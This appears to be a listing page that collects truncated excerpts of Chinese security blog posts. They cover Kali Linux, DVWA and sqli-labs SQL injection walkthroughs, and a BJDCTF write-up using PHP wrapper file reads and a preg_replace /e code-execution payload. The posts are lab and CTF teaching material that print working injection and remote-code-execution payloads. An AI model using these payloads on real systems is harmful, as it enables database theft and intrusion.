HackBar

信息安全深透测试与工房(二)kali linux使用环境

泄露秘密 提交于 2020-12-24 17:48:49
1、KALI LINUX 介绍 l 基于Debian的Linux发 ⾏ 版本 l 前 ⾝ 是 BackTrack ,2013年3 ⽉ 发布 l ⽤ 于***测试和安全审计 l 包含600+安全 ⼯ 具(也可自己下载添加) l FHS 标准 目 录结构 l 定制内核 l ⽀ 持 ARM 和 ⼿ 机平台 l 开源免费 kali linux 这个工具不管是对我们还是技术大拿来说,都是一个很好的安全测试或者防护的工具,当然我肯定不会对kali linux里600+安全 ⼯ 具都介绍,我只会挑选一些相对好用简单的、能满足我们基础安全运维的工具来进行介绍。 2、 KALI LINUX下载及更新 kali linux 下载安装镜像: https://www.kali.org/downloads/ 大家可以在这个官方网站进行下载,里面有ISO、vmware等版本的镜像。我是直接下载kali-linux-2019.4-vmware-amd64.zip这个版本直接使用虚拟机打开。想使用启动光盘去安装可以下载kali-linux-2020-1-live-amd64-iso这个版本。如果你想使用U盘来启动安装,可以先去下载个U盘制作工具unetbootin,然后打开去制作一个U盘启动: 按上面的配置选项,开始进行制作 制作完成后,使用U盘启动安装后,会出现如下界面: 选项介绍: Live(amd64):

SQL Injection

淺唱寂寞╮ 提交于 2020-11-21 01:27:10
Low级别 判断是否存在注入点 输入1提交 输入1 and 1=1提交 SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' 输入1 and 1=2提交 由上可以看出是存在注入点的,参数为id SELECT first_name, last_name FROM users WHERE user_id = ' id ' 利用漏洞获取信息 获取当前库名 1后面的‘是为了使前面的参数闭合最后的#是为了注释‘ 1 ' union select 1,database()# 实际执行sql SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' union select 1 , database ()# ' 根据库名获取所有表名 1后面的‘是为了使前面的参数闭合最后的#是为了注释‘ 1 ' union select 1,table_name from information_schema.tables where TABLE_SCHEMA= ' dvwa ' # 底层执行sql SELECT first_name, last_name FROM users WHERE user_id = ' 1 ' union select 1 ,table_name

第二次web任务

心已入冬 提交于 2020-08-10 02:30:01
首先自从上次的任务之后,我发现我的基础知识几乎是没有的,很多东西理解不了,也做不出来。于是我决定补补基础知识。 首先关于虚拟机 1、通过查阅我认为,虚拟机就是通过程序模拟出来的计算机,没有物理结构,通常被用来保护物理计算机的。 (此处发生了一点小意外,我的JAVA被我搞坏了,我在清理桌面的时候不知道是把什么卸载了于是我的JAVA也坏了) Dirsearch学习笔记 首先我遇到了的第一个问题就是,打不开!闪退! 首先猜测Python的版本问题,百度之后发现是我智商问题,要在cmd中启动。 下一个神奇的问题,cmd找不到这个东西,我认为是我的命令语句有问题 显示找不到文件 这个地方遇到了一些小问题,没有成功。 发现了,命令不对 这就可以了 下面是搭建dvwa靶场 首先下载dvwa,复制到PHPstudy的www文件夹下,然后找到config用记事本打开,此处我犯了一个错误。按理说应该先建立一个数据库,在进行一系列的更改操作。但是我并没有建立数据库,而是直接选择了更改。于是乎我的一个下午报销了。 此处更改数据库用户名及密码 后知后觉的建立数据库 还有这个迷惑了我许久的这个网址到底是怎么来的这个问题 成功 这里在这部一句,我一开始以为这就是他的界面,后来我才知道,需要登录与数据库匹配。。。。又是疑惑了好久 这个才是正常的 brupsuit的使用没有做特别详细的记录,在做题的时候有部分截图。

[BJDCTF2020]ZJCTF,不过如此

眉间皱痕 提交于 2020-05-05 14:58:01
0x00 知识点 本地文件包含伪协议 ?text=php://input //执行 post: I have a dream ?file=php://filter/read/convert.base64-encode/resource=index.php preg_replace()使用的/e模式可以存在远程执行代码 链接: https://xz.aliyun.com/t/2557 payload 为: /?.*={${phpinfo()}} , 即 GET 方式传入的参数名为 /?.* ,值为 {${phpinfo()}} payload2: \S*=${phpinfo()} 0x01 解题 打开题目,给了我们源代码: 分析一下: 1:通过get方式传入$text和$file 2:text变量中内容要是I have a dream 3:file中不能有flag关键字 一开始还想用正则贪婪模式匹配绕过。后来发现就是伪协议。。 直接传参读取next.php源码: <?php $id = $_GET['id']; $_SESSION['id'] = $id; function complex($re, $str) { return preg_replace( '/(' . $re . ')/ei', 'strtolower("\\1")', $str ); } foreach($

sqli-labs通关教程----21~30关

泪湿孤枕 提交于 2020-04-21 10:39:42
第二十一关 第二十一关我们正常登陆后看到,uname后面变成了一堆字母 这是经过base64编码之后的样子,所以就照葫芦画瓢,将我payload的uname后面的部分转码成base64,这里可以用正常的注入套路order by等一步步走,但为了方便我直接用报错注入,但这里注意闭合是') uname=admin') and updatexml(1,concat(0x7e,(select database())),0) # 将uname=后面的部分都base64编码一下 uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSksMCkgIw== 爆内容: uname=YWRtaW4nKSBhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBwYXNzd29yZCBmcm9tIHVzZXJzIGxpbWl0IDAsMSkpLDApIw== 第二十二关 这关正常登陆和上关回显一样盲猜就是换了个闭合符号,测试下还真是闭合换成了"双引号 爆内容: uname

【代码审计01】几种常见的漏洞种类以及代码审计工具

。_饼干妹妹 提交于 2020-03-25 12:53:00
3 月,跳不动了?>>> 前言 代码审计是在经过黑盒测试完毕,也就是检查应用的基本功能是否符合产品业务需求下进行的。需要有一定的编码基础以及对漏洞形成原理的基本认知,通过工具或者经验检测代码中可能出现的bug,并在不同平台(windows,linux),不同PHP版本下测试。比如PHP的很多新版本会对一些指令废弃删除,但是在旧版本中却能使用,而该版本下的指令即有可能会被人发现漏洞。 PHP核心配置 PHP配置对于大多数人都是通过php.ini设置,但其实是有配置范围的,比如一些指令配置只能通过php.ini配置,也有一些可以在PHP脚本中设置,通过ini_set()函数,详细可以查询PHP_INI.*的列表和ini_set使用方法。 代码审计工具 1.seay源代码审计工具(公众号回复"审计"可获取) 2. HackBar漏洞验证辅助(火狐浏览器扩展) 代码审计思路 1. 查看敏感函数追踪参数 2. 全部通读一遍源码了解逻辑 3. 按功能点审计追踪 常见的几种漏洞类型 1. SQL注入 2. XSS漏洞(跨站脚本攻击) 3. CSRF漏洞(跨站请求伪造) 4. 文件操作漏洞 5. 代码执行漏洞 6. 命令执行漏洞 7. 变量覆盖漏洞 8. 业务逻辑漏洞 9. 越权与提权 10. 二次注入 11. ……等等 小结&待续 由于在代码审计中会涉及到很多知识点,所以这里只先总结一个引文

安全入门级工具之web站点安全扫描分析

自闭症网瘾萝莉.ら 提交于 2019-12-10 04:10:28
1.awvs(Acunetix Web Vulnerability Scanner) 从名字可以得知,这是一个对web项目进行扫描的工具,安装比较简单。默认情况下一个项目的扫描时间会比较长,大约需要几天的时间。可以启动多个,拆分成不同的子项目进行扫描(如果项目可以拆分) 2.burp 对漏洞进行分析的工具,可以模拟在线漏洞。支持get、post等请求,编解码,对比等功能。 3.火狐插件hackbar 直接安装插件即可,需要说明的是新版本的火狐hackbar会失效,需要安装new hackbar插件 4.火狐插件FoxyProxy 代理管理插件 【官方网址:】 https://www.acunetix.com/vulnerability-scanner/ https://portswigger.net/ 【资源网址:】 https://www.waitalone.cn/burpsuite-forever.html 来源: oschina 链接: https://my.oschina.net/u/922703/blog/1830079